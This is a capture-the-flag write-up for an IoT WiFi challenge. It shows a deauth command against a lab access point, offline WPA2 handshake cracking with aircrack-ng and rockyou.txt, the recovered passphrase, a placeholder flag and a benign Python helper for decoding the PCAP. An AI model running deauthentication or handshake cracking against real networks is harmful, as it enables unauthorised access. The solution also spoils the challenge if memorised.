Cr4cK_W1F1
| Field | Value |
|---|---|
| Category | IoT |
| Difficulty | Medium |
| Points | TBD |
| Author | Eun0us |
| CTF | Espilon 2026 |
Description
You have recovered UART access to a red team WiFi sniffer tool. Analyze the captured data to recover the WiFi password, then connect to the network and retrieve the flag.
- TX (read UART): port 1111
- RX (write UART): port 2222
TL;DR
Use the sniffer to force a WPA2 4-way handshake capture, extract the PCAP from the UART
output (base64-encoded), crack the handshake with aircrack-ng and rockyou.txt to find
the passphrase sunshine, then connect and read the flag.
Tools
| Tool | Purpose |
|---|---|
| `nc` | Connect to UART TX/RX ports |
| `base64` | Decode the PCAP blob |
| `aircrack-ng` | Crack WPA2 handshake |
| `rockyou.txt` | Password wordlist |
Solution
Step 1 — Open both UART channels
# Terminal 1 — TX (read output)
nc <host> 1111
# Terminal 2 — RX (send commands)
nc <host> 2222
Step 2 — Start the sniffer and force a deauth
In the RX terminal:
sniffer start
deauth TestNet 02:00:00:aa:00:01
sniffer stop
The deauthentication forces the target client to reconnect and redo the WPA2 4-way handshake.
Step 3 — Extract the PCAP from TX
On the TX terminal, output appears between markers:
PCAP_BASE64_BEGIN
<base64 data>
PCAP_BASE64_END
Copy the base64 lines to a file and decode:
base64 -d handshake.b64 > handshake.pcap
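Copying the blob by hand is error-prone when the TX stream carries other console output, so the following added example (not part of the original write-up) pulls the marker-delimited block out of a saved TX log, decodes it, and checks that the result starts with a valid pcap global header. It assumes the blob is one base64 stream split across lines; the sample log and its `[sniffer]` noise lines are constructed for illustration.

```python
import base64
import struct

BEGIN, END = "PCAP_BASE64_BEGIN", "PCAP_BASE64_END"

# First four bytes of a classic pcap file -> struct byte-order prefix.
PCAP_MAGICS = {
    b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">",  # microsecond timestamps
    b"\x4d\x3c\xb2\xa1": "<", b"\xa1\xb2\x3c\x4d": ">",  # nanosecond timestamps
}


def extract_pcap(tx_log: str) -> bytes:
    """Decode the last complete BEGIN/END block found in a saved TX log."""
    current, done = None, None
    for raw in tx_log.splitlines():
        line = raw.strip()  # serial consoles usually terminate lines with \r\n
        if line == BEGIN:
            current = []  # a new BEGIN discards any unterminated block
        elif line == END and current is not None:
            done, current = current, None
        elif current is not None and line:
            current.append(line)
    if done is None:
        raise ValueError("no complete PCAP_BASE64 block in log")
    # validate=True rejects stray console text interleaved with the blob
    return base64.b64decode("".join(done), validate=True)


def pcap_linktype(data: bytes) -> int:
    """Check the 24-byte pcap global header and return its link type."""
    if len(data) < 24 or data[:4] not in PCAP_MAGICS:
        raise ValueError("decoded data is not a classic pcap file")
    fields = struct.unpack(PCAP_MAGICS[data[:4]] + "HHiIII", data[4:24])
    return fields[5] & 0xFFFF  # low 16 bits carry the link type


# Constructed sample: a bare pcap header (link type 105, IEEE 802.11) wrapped
# the way the TX channel wraps it; the "[sniffer]" lines are invented noise.
_hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)
_b64 = base64.b64encode(_hdr).decode()
SAMPLE_TX_LOG = ("[sniffer] started\r\nPCAP_BASE64_BEGIN\r\n"
                 + _b64[:16] + "\r\n" + _b64[16:] + "\r\n"
                 + "PCAP_BASE64_END\r\n[sniffer] stopped\r\n")

if __name__ == "__main__":
    pcap = extract_pcap(SAMPLE_TX_LOG)
    print(len(pcap), "bytes, link type", pcap_linktype(pcap))
```

A decode error or a header check failure here usually means console text landed inside the block or the capture was cut off before `PCAP_BASE64_END`.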
Step 4 — Crack the WPA2 handshake
aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap
Output:
KEY FOUND! [ sunshine ]
Step 5 — Connect and read the flag
In the RX terminal:
connect TestNet sunshine
cat /flag.txt
Flag
CTF{CR4CK_W1F1_EXAMPLE}
Note: This challenge was still being finalized at time of writing. The flag above is a placeholder; the real flag will be updated before deployment.




